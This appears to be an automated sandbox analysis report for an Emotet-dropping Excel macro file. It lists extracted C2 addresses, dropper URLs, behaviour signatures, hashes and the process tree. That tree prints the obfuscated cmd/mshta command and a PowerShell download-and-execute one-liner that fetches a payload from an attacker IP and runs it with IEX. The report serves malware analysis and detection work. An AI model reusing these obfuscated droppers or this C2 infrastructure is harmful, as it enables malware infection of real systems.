Analysis

  • max time kernel
    144s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    19-01-2022 12:21

General

  • Target

    2357791489929.xlsm

  • Size

    114KB

  • MD5

    59bb12f8b33655197b483c1612fdf069

  • SHA1

    c676bb82a91acfed31a84ddc9c7835a0cf33414d

  • SHA256

    515c9e3ac18310c9234c70c9b9b782b3b7cf48fe16da7547ca683acc944ad997

  • SHA512

    4ce89ab6398de3fe479935723875f24b44009018416b936aadeabbf7e76c0d4ec0de9fad8497508d6dc61c46a0d8f5af1ba74dc4374bee4834a707d3e1a9b166

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/sec.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/sec.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\2357791489929.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0x5cff39c3/sec/sec.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1356
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1836
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2008
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1188
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1296
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cxlsxea\bjvzkef.zbh",QdwKVxQYSiwj
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1676
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cxlsxea\bjvzkef.zbh",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1732

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll

    MD5

    d00773a07e0d7f7e843d4dcb3a21abd0

    SHA1

    17690798074e37e35091cb515b22661cf92d63fd

    SHA256

    43c12d7dee2b27d57b9a5b80c034600c6b396dfc1534379c481d05cb24ab7e49

    SHA512

    f0857e1980dfe39665d877ce4b5150be952fd2a451937d886cfa563c6769a54aec5aba79c2d28911b23dc768c2699362abd3920a950e81a360effb98d21c06ce

  • \Users\Public\Documents\ssd.dll

    MD5

    d00773a07e0d7f7e843d4dcb3a21abd0

    SHA1

    17690798074e37e35091cb515b22661cf92d63fd

    SHA256

    43c12d7dee2b27d57b9a5b80c034600c6b396dfc1534379c481d05cb24ab7e49

    SHA512

    f0857e1980dfe39665d877ce4b5150be952fd2a451937d886cfa563c6769a54aec5aba79c2d28911b23dc768c2699362abd3920a950e81a360effb98d21c06ce

  • \Users\Public\Documents\ssd.dll

    MD5

    d00773a07e0d7f7e843d4dcb3a21abd0

    SHA1

    17690798074e37e35091cb515b22661cf92d63fd

    SHA256

    43c12d7dee2b27d57b9a5b80c034600c6b396dfc1534379c481d05cb24ab7e49

    SHA512

    f0857e1980dfe39665d877ce4b5150be952fd2a451937d886cfa563c6769a54aec5aba79c2d28911b23dc768c2699362abd3920a950e81a360effb98d21c06ce

  • \Users\Public\Documents\ssd.dll

    MD5

    d00773a07e0d7f7e843d4dcb3a21abd0

    SHA1

    17690798074e37e35091cb515b22661cf92d63fd

    SHA256

    43c12d7dee2b27d57b9a5b80c034600c6b396dfc1534379c481d05cb24ab7e49

    SHA512

    f0857e1980dfe39665d877ce4b5150be952fd2a451937d886cfa563c6769a54aec5aba79c2d28911b23dc768c2699362abd3920a950e81a360effb98d21c06ce

  • \Users\Public\Documents\ssd.dll

    MD5

    d00773a07e0d7f7e843d4dcb3a21abd0

    SHA1

    17690798074e37e35091cb515b22661cf92d63fd

    SHA256

    43c12d7dee2b27d57b9a5b80c034600c6b396dfc1534379c481d05cb24ab7e49

    SHA512

    f0857e1980dfe39665d877ce4b5150be952fd2a451937d886cfa563c6769a54aec5aba79c2d28911b23dc768c2699362abd3920a950e81a360effb98d21c06ce

  • \Users\Public\Documents\ssd.dll

    MD5

    d00773a07e0d7f7e843d4dcb3a21abd0

    SHA1

    17690798074e37e35091cb515b22661cf92d63fd

    SHA256

    43c12d7dee2b27d57b9a5b80c034600c6b396dfc1534379c481d05cb24ab7e49

    SHA512

    f0857e1980dfe39665d877ce4b5150be952fd2a451937d886cfa563c6769a54aec5aba79c2d28911b23dc768c2699362abd3920a950e81a360effb98d21c06ce

  • \Users\Public\Documents\ssd.dll

    MD5

    d00773a07e0d7f7e843d4dcb3a21abd0

    SHA1

    17690798074e37e35091cb515b22661cf92d63fd

    SHA256

    43c12d7dee2b27d57b9a5b80c034600c6b396dfc1534379c481d05cb24ab7e49

    SHA512

    f0857e1980dfe39665d877ce4b5150be952fd2a451937d886cfa563c6769a54aec5aba79c2d28911b23dc768c2699362abd3920a950e81a360effb98d21c06ce

  • \Users\Public\Documents\ssd.dll

    MD5

    d00773a07e0d7f7e843d4dcb3a21abd0

    SHA1

    17690798074e37e35091cb515b22661cf92d63fd

    SHA256

    43c12d7dee2b27d57b9a5b80c034600c6b396dfc1534379c481d05cb24ab7e49

    SHA512

    f0857e1980dfe39665d877ce4b5150be952fd2a451937d886cfa563c6769a54aec5aba79c2d28911b23dc768c2699362abd3920a950e81a360effb98d21c06ce

  • \Users\Public\Documents\ssd.dll

    MD5

    d00773a07e0d7f7e843d4dcb3a21abd0

    SHA1

    17690798074e37e35091cb515b22661cf92d63fd

    SHA256

    43c12d7dee2b27d57b9a5b80c034600c6b396dfc1534379c481d05cb24ab7e49

    SHA512

    f0857e1980dfe39665d877ce4b5150be952fd2a451937d886cfa563c6769a54aec5aba79c2d28911b23dc768c2699362abd3920a950e81a360effb98d21c06ce

  • memory/1188-70-0x0000000000240000-0x0000000000268000-memory.dmp

    Filesize

    160KB

  • memory/1296-87-0x00000000025B0000-0x00000000025D8000-memory.dmp

    Filesize

    160KB

  • memory/1296-90-0x00000000027C0000-0x00000000027E8000-memory.dmp

    Filesize

    160KB

  • memory/1296-77-0x00000000002A0000-0x00000000002C8000-memory.dmp

    Filesize

    160KB

  • memory/1296-81-0x0000000000A50000-0x0000000000A78000-memory.dmp

    Filesize

    160KB

  • memory/1296-85-0x0000000002500000-0x0000000002528000-memory.dmp

    Filesize

    160KB

  • memory/1668-57-0x0000000075F81000-0x0000000075F83000-memory.dmp

    Filesize

    8KB

  • memory/1668-116-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1668-54-0x000000002FC81000-0x000000002FC84000-memory.dmp

    Filesize

    12KB

  • memory/1668-55-0x0000000071551000-0x0000000071553000-memory.dmp

    Filesize

    8KB

  • memory/1668-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1732-95-0x0000000000320000-0x0000000000348000-memory.dmp

    Filesize

    160KB

  • memory/1732-97-0x00000000003C0000-0x00000000003E8000-memory.dmp

    Filesize

    160KB

  • memory/1732-99-0x0000000000A10000-0x0000000000A38000-memory.dmp

    Filesize

    160KB

  • memory/1732-105-0x0000000002820000-0x0000000002848000-memory.dmp

    Filesize

    160KB

  • memory/1732-107-0x0000000002880000-0x00000000028A8000-memory.dmp

    Filesize

    160KB

  • memory/1732-109-0x0000000002930000-0x0000000002958000-memory.dmp

    Filesize

    160KB

  • memory/1732-111-0x0000000002A60000-0x0000000002A88000-memory.dmp

    Filesize

    160KB

  • memory/1732-113-0x0000000002B70000-0x0000000002B98000-memory.dmp

    Filesize

    160KB

  • memory/1732-115-0x0000000002BD1000-0x0000000002BF5000-memory.dmp

    Filesize

    144KB

  • memory/1836-63-0x00000000022D0000-0x00000000025D0000-memory.dmp

    Filesize

    3.0MB

  • memory/1836-62-0x00000000022D0000-0x00000000025D0000-memory.dmp

    Filesize

    3.0MB